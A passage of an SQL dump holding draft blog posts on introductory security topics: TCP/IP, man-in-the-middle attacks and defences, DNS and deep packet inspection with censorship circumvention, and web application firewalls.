Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Make cybersecurity everyone’s responsibility. Encourage open communication and provide ongoing education to ensure staff are equipped with the knowledge to recognize and prevent risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Moving Forward</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyberthreats evolve rapidly, and inaction isn’t an option. Organizations must prioritize patching vulnerabilities while partnering with reliable third-party solutions to create a stronger cybersecurity foundation. The balance between mitigating risks and leveraging external expertise is where businesses can truly thrive in the face of relentless digital threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Don’t wait for the next breach to act. Start revisiting your organization’s approach to patch management and third-party integrations today to ensure your cybersecurity strategy is future-ready. Together, we can patch the paradox and secure cyberspace effectively.</p>', '', NULL, NULL, 1, 'draft', '2025-01-13 05:00:00', '2026-01-12 21:41:44', 'Information Security', 'Patching the Paradox: Securing Cyberspace with Third-Party Reliability', '', NULL),
(78, 'TCP/IP Simplified: How Data Travels Across the Internet', 'tcp-ip-simplified-how-data-travels-across-the-internet', 'Ever wondered how your messages or emails reach their destination within milliseconds? Think of it like sending a package—except instead of one box, it’s broken into tiny pieces, each taking a unique path before reassembling at the destination perfectly. Welcome to the fascinating world of TCP/IP, the protocol powering modern networking and ensuring data moves securely and accurately across the internet.\r\n<h2>The Origins of TCP/IP</h2>\r\nThe story of TCP/IP starts in the 1970s with ARPANET, one of the first computer networks created by the U.S. Department of Defense. Initially connecting research institutions over telephone lines, ARPANET relied on Network Control Protocol (NCP). However, the limitations of NCP led to the development of TCP (Transmission Control Protocol) combined with IP (Internet Protocol). Together, they formalized the rules that allow data to travel reliably across networks, laying the foundation for today’s global internet.\r\n<h2>How TCP/IP Powers the Internet</h2>\r\nThink of TCP/IP as the digital postal service. When you send data across the internet, TCP/IP ensures it travels through multiple layers, each playing a specific role in delivering that \"package.\" Let\'s break it down using this analogy:\r\n<ol>\r\n 	<li><strong>Application Layer</strong>\r\nAt the top of the TCP/IP structure, the application layer acts as the \"planner.\" This is where user-facing applications like browsers, email clients, or messaging apps prepare data for transmission. For example, when you type a URL into your browser, the application layer creates an HTTP request to retrieve a webpage. It uses protocols like HTTP (for websites) or HTTPS (for secure browsing).</li>\r\n 	<li><strong>Transport Layer</strong>\r\nThe transport layer steps in to split that data into smaller, manageable chunks (called \"segments\" or \"datagrams\"). If using TCP, it also guarantees each segment is delivered correctly and in sequence, thanks to a process called the \"three-way handshake,\" which establishes a reliable connection. This layer acts like the postal service tracking system, verifying that everything is on the right path.For fast but less reliable communication, protocols like UDP (User Datagram Protocol) are used. While UDP doesn\'t guarantee delivery or order, it\'s ideal for applications where speed is more important than reliability, like live video streaming.</li>\r\n 	<li><strong>Internet Layer</strong>\r\nThe internet layer (via the IP protocol) acts as the navigator, ensuring data segments (now called \"packets\") take the correct route. It assigns source and destination addresses to each packet, much like labeling a package with an address. Routers interpret this information and forward the packets through networks toward their destination.</li>\r\n 	<li><strong>Network Access Layer</strong>\r\nFinally, the network access layer ensures the physical transmission of data across networks. Picture this as the trucks and postal workers delivering your package. Data is formatted into \"frames,\" which include MAC addresses (unique identifiers for devices on a network). These frames are decapsulated and updated at each stop (like postal hubs), ensuring the data reaches the correct device.</li>\r\n</ol>\r\n<h2>What Happens When the Data Arrives?</h2>\r\nOnce the packets reach their destination, they are reassembled into their original form. The server decodes all the encapsulated information (working backward through the layers) to reveal your request—be it loading a webpage or delivering a file. It then processes the request and sends back a response, encapsulating data in headers for the return trip.\r\n\r\nIt’s worth noting that the packets may take entirely different routes back, yet TCP ensures everything arrives intact and in order, no matter the path.\r\n<h2>Exploring the OSI Model</h2>\r\nWhile the TCP/IP model is widely used, another conceptual framework called the OSI (Open Systems Interconnection) model provides a more detailed breakdown. The OSI model divides networking into seven layers, including additional ones for presentation (translating data formats) and session (managing ongoing sessions). While not directly implemented like TCP/IP, the OSI model offers valuable insight into how data transmission works.\r\n<h2>Why TCP/IP Matters for Cybersecurity Learners and Tech Enthusiasts</h2>\r\nUnderstanding TCP/IP is key to grasping how the internet functions, especially for those pursuing careers in cybersecurity or IT. Knowledge of how data packets travel, how connections are established, and the potential vulnerabilities at each layer is foundational for tackling network security challenges like Man-in-the-Middle attacks or unauthorized access.\r\n\r\nDive deeper into this topic to build your expertise. After all, the better you understand the inner workings of TCP/IP, the more prepared you\'ll be to safeguard and optimize the networks powering our digital world.\r\n\r\n&nbsp;', '', NULL, NULL, 1, 'draft', '2025-01-12 13:00:22', '2026-01-12 21:41:44', 'Information Security', 'TCP/IP Simplified: How Data Travels Across the Internet', '', NULL),
(79, 'Understanding Man-in-the-Middle Attacks and How to Stay Safe', 'understanding-man-in-the-middle-attacks-and-how-to-stay-safe', '<h2>What are Man-in-the-Middle (MITM) Attacks?</h2>\r\nMan-in-the-Middle (MITM) attacks are one of the most common and dangerous cybersecurity threats. These attacks occur when cybercriminals position themselves between two parties communicating online (e.g., you and a website) to intercept, monitor, or manipulate the data being transmitted—without either party realizing the attack.\r\n\r\nMITM attacks exploit vulnerabilities in networks, email accounts, web browsers, and even user behavior. The consequences? Stolen sensitive data like login credentials, financial information, and altered communications that benefit the attacker.\r\n\r\nIf you\'ve ever wondered whether your online communications are truly private, it\'s time to take a closer look at MITM attacks—and more importantly, learn how to safeguard yourself.\r\n<h2>How Man-in-the-Middle Attacks Work</h2>\r\n<h3><strong>Step 1: Interception</strong></h3>\r\nThe first step in a MITM attack is intercepting data traveling between two parties. Hackers may exploit unsecured networks, rogue Wi-Fi hotspots (like “Evil Twins”), or phishing links to insert themselves into the communication channel without either party noticing.\r\n\r\nExamples include:\r\n<ul>\r\n 	<li><strong>Public Wi-Fi Eavesdropping</strong> – Hackers target unsecured public networks like those in cafes or airports to intercept communications and data packets.</li>\r\n 	<li><strong>Phishing and Malware</strong> – A fraudulent email with malicious links may download malware onto a user’s device, giving attackers access to the data being transmitted.</li>\r\n</ul>\r\n<h3><strong>Step 2: Decryption</strong></h3>\r\nOnce attackers intercept the communication, they decrypt the data to extract sensitive information. While encryption protocols like SSL/TLS protect most modern communications, cybercriminals may still steal encryption keys, spoof IP addresses, or employ brute force attacks to bypass safeguards.\r\n<h2>Common Man-in-the-Middle Attack Techniques</h2>\r\n<ol>\r\n 	<li><strong>Wi-Fi Eavesdropping</strong>\r\nBy setting up rogue Wi-Fi networks that mimic legitimate ones, attackers can trick unsuspecting users into connecting to their fake access points. Once connected, hackers intercept sensitive communication, stealing login credentials or credit card numbers via packet sniffing tools like Wireshark.</li>\r\n 	<li><strong>DNS Spoofing</strong>\r\nThe Domain Name System (DNS) functions like an internet phonebook, mapping domain names to IP addresses. Attackers tamper with DNS entries to redirect users to fake, lookalike websites designed to steal user credentials or personal data.</li>\r\n 	<li><strong>Session Hijacking</strong>\r\nAttackers steal session cookies—the small data files used to verify a user’s identity during active logins—to impersonate users on secure websites like online banking or email platforms. This exploitation, often called \"side-jacking,\" allows attackers to take over active sessions without needing login credentials.</li>\r\n 	<li><strong>Man-in-the-Browser</strong>\r\nThis involves browser-based malware that covertly alters transactions or captures sensitive information without raising suspicion. For instance, malware might modify the details of a bank transfer while presenting legitimate information to the user.</li>\r\n</ol>\r\n<h2>How to Protect Yourself from MITM Attacks</h2>\r\n<h3>1. <strong>Use HTTPS Websites</strong></h3>\r\nAlways ensure the websites you visit display a padlock icon and “HTTPS” in the address bar. HTTPS connections encrypt your communication, making it harder for attackers to intercept or decrypt data. Avoid HTTP-only websites entirely.\r\n<h3>2. <strong>Secure Your Wi-Fi</strong></h3>\r\n<ul>\r\n 	<li>Avoid using public Wi-Fi networks for sensitive activities like banking or shopping.</li>\r\n 	<li>Use a Virtual Private Network (VPN) when accessing public networks to create a secure, encrypted tunnel for your data.</li>\r\n 	<li>Keep your home Wi-Fi password-protected and updated.</li>\r\n</ul>\r\n<h3>3. <strong>Beware of Phishing Attempts</strong></h3>\r\nThink twice before clicking on links in unsolicited emails or messages. Verify the sender’s identity and check the URL for misspellings, as phishing websites often mimic legitimate ones.\r\n<h3>4. <strong>Install Browser Extensions</strong></h3>\r\nUse browser extensions like HTTPS Everywhere to redirect you to HTTPS versions of websites automatically.\r\n<h3>5. <strong>Enable Multi-Factor Authentication (MFA)</strong></h3>\r\nMFA adds an extra security layer, ensuring attackers cannot access your accounts even if they acquire your login credentials.\r\n<h3>6. <strong>Run Regular Software Updates</strong></h3>\r\nUpdate your operating system, browsers, and apps regularly to patch vulnerabilities that attackers could exploit.\r\n<h3>7. <strong>Educate Yourself and Your Team</strong></h3>\r\nIf you’re part of an organization, implement cybersecurity awareness training to educate employees about avoiding common threats like phishing, fake Wi-Fi networks, and malicious attachments.\r\n<h2>Why MITM Attacks Are Dangerous</h2>\r\nMan-in-the-Middle attacks are especially malicious because they exploit the systems we use every day for shopping, banking, and even personal conversations. Worse, they’re difficult to detect since everything seems normal to the user.\r\n\r\nBy learning the most common attack techniques and adopting proper safeguards, both individuals and organizations can minimize the risks significantly.\r\n<h2>Finally</h2>\r\nMan-in-the-Middle attacks remind us that online security demands proactive measures, from encrypting communications to avoiding risky public networks. Investing a little time into securing your online interactions can prevent significant data breaches and financial losses.', '', NULL, NULL, 1, 'draft', '2025-01-11 22:40:19', '2026-01-12 21:41:44', 'Information Security', 'Understanding Man-in-the-Middle Attacks and How to Stay Safe', '', NULL),
(80, 'Understanding DNS, Deep Packet Inspection, and the Battle Against Internet Censorship', 'understanding-dns-deep-packet-inspection-and-the-battle-against-internet-censorship', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Internet censorship has been a challenge since the very early days of the web. Yet, as the demand for online freedom grows, so do the complexities of censorship techniques. One of the most significant advancements in this field is <b><strong class=\"font-bold\">Deep Packet Inspection (DPI)</strong></b>. But what is it, how does it work, and how can it be mitigated? Let\'s break it down step by step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding the Basics of DNS and Internet Requests</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before exploring DPI, it’s essential to understand how your internet connection works at its core.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you enter a website\'s name, like \"google.com,\" into your browser, your computer sends a request to a <b><strong class=\"font-bold\">DNS server</strong></b> (Domain Name System). Think of this as a phonebook for the Internet—it translates the human-readable domain name into a machine-readable IP address.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how the DNS process works in simple terms:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Your computer asks the DNS server, “What’s the IP address for google.com?”</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">The DNS server responds with the corresponding IP address (e.g., 108.177.127.139).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Your computer then connects to that IP address and retrieves the requested web page.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The problem, however, lies in the visibility of this request. Without any protection, your Internet Service Provider (ISP) can see these requests, making your browsing activity public to them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Evolution of Internet Censorship</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Initially, censors relied on simpler methods to restrict access to websites. This could include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Blocking IP addresses:</strong></b> Preventing connections to specific server addresses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Monitoring DNS queries:</strong></b> Observing and manipulating the DNS server responses to block specific domains.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">However, as users adopted protective measures like encrypted DNS protocols (e.g., DNS-over-HTTPS and DNS-over-TLS), these simple censorship techniques became less effective. This brings us to the more advanced method—<b><strong class=\"font-bold\">Deep Packet Inspection (DPI)</strong></b>.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Deep Packet Inspection (DPI)?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deep Packet Inspection is a sophisticated method ISPs use to inspect the data packets that pass through their network.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When a user tries to access a website, their data is sent in \"packets.\" DPI differs from traditional inspection practices because it examines not only the metadata of the packet (like the IP address) but also the contents of the payload (the actual data being transmitted).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how DPI works:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">When you send a packet to a website (e.g., Google), your ISP intercepts the packet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">DPI tools analyze both the metadata (like the domain’s IP address) and the actual content inside the packet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">If the content matches a blocked site or flagged service, the packet is discarded, preventing access to the site.</li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Is DPI Effective for Censorship?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike traditional IP and DNS blocking, DPI allows ISPs to examine encrypted traffic, such as HTTPS handshakes. For instance, even if the website uses HTTPS, DPI can extract information from metadata like the <b><strong class=\"font-bold\">SNI field</strong></b> (Server Name Indication) to determine which website is being accessed.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges with DPI and Its Limitations</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While DPI is powerful, it comes with significant downsides:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Expensive Infrastructure:</strong></b> DPI requires advanced hardware and high-performance processors to analyze packets at scale without slowing down internet speeds.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Overblocking Risks:</strong></b> Many IP addresses host multiple websites, especially on shared hosting or Content Delivery Networks (CDNs). Blocking one IP could inadvertently block thousands of unrelated sites.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Resistance Techniques:</strong></b> Individuals and organizations continually develop tools and techniques to bypass DPI.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Mitigate DPI Censorship</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The good news is that strategies exist to counteract DPI censorship and protect online privacy. Some common approaches include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Encryption Protocols:</strong></b> Using DNS-over-HTTPS or DNS-over-TLS encrypts DNS queries, ensuring that ISPs cannot see what domains you’re trying to access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">VPNs (Virtual Private Networks):</strong></b> VPNs encrypt all your internet traffic, making it nearly impossible for DPI tools to inspect your data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Tor Network:</strong></b> The Tor browser routes your traffic through multiple servers (nodes), hiding your real IP address and encrypting your data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Obfuscation Tools:</strong></b> Techniques like encryption proxy services or tools like GoodbyeDPI can disguise your traffic to confuse DPI systems.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ethical Considerations of DPI</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It is important to note that DPI is not solely utilized for censorship—it can also play a role in improving network security. For example, companies use DPI to monitor and protect sensitive data on their networks against cyberattacks. However, when misused for censorship or surveillance, it raises significant ethical questions regarding privacy and freedom of expression.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deep Packet Inspection represents both a challenge and an opportunity in the ongoing evolution of the internet. While it’s an effective tool for certain legitimate purposes, such as improving cybersecurity, its use in censorship limits freedom and raises privacy concerns.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To achieve a balance, understanding DPI and leveraging protective tools like VPNs and encrypted protocols empowers users to maintain their online freedom.</p>', '', NULL, NULL, 1, 'draft', '2025-01-10 19:28:43', '2026-01-12 21:41:44', 'Information Security', 'Understanding DNS, Deep Packet Inspection, and the Battle Against Internet Censorship', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(81, 'What is a Web Application Firewall? Why We Need to know', 'what-is-a-waf-why-we-need-to-know', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web applications are the backbone of modern businesses, making them a prime target for cyber threats. For cybersecurity professionals, staying ahead of these threats is critical—and one tool that stands out in protecting web applications is the Web Application Firewall (WAF).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores Web Application Firewalls and their role in safeguarding online assets. We’ll break down their features, their importance, and why knowledge of WAFs is essential for cybersecurity analysts. Whether you\'re just starting out or seeking to improve your defenses, this is your go-to guide for all things WAF.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Web Application Firewall (WAF)?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Web Application Firewall (WAF) is a security solution designed to protect web applications by filtering, monitoring, and blocking malicious HTTP traffic. Unlike conventional firewalls that operate at the network layer, a WAF focuses on the application layer, acting as a shield between your web application and incoming internet traffic.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of a WAF as a gatekeeper—it scrutinizes every data request hitting your web application to ensure harmful traffic gets blocked while legitimate traffic flows through.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Web Application Firewalls:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Traffic Filtering</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs analyze HTTP requests and responses, blocking malicious traffic such as SQL injections or XSS (Cross-Site Scripting) attacks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Real-Time Monitoring</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Continuous surveillance ensures quick detection and prioritization of potential threats as they occur.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Protection Against Common Attacks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">They are especially effective at preventing SQL Injection, Cross-Site Request Forgery (CSRF), and other widespread vulnerabilities.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">IP Cloaking</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many modern WAFs hide your web server’s real IP address, adding an additional layer of security against attackers.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Behavioral Analysis</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Advanced WAFs can identify unusual traffic patterns and detect new threats that don’t match known signatures.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Do Web Application Firewalls Work?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs function by analyzing incoming and outgoing HTTP requests using predefined security rules. These rules—customizable based on application needs—help determine whether a request should be allowed or blocked.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Typical Process of a WAF:</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Inspection</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The WAF examines each incoming HTTP request.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Filtering</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Requests that don\'t adhere to safety rules are filtered and blocked.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Logging</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Suspicious activities are logged for future analysis by cybersecurity teams.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">WAFs are also versatile in deployment:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cloud-Based</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hosted by a cloud provider, allowing scalability and ease of management.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 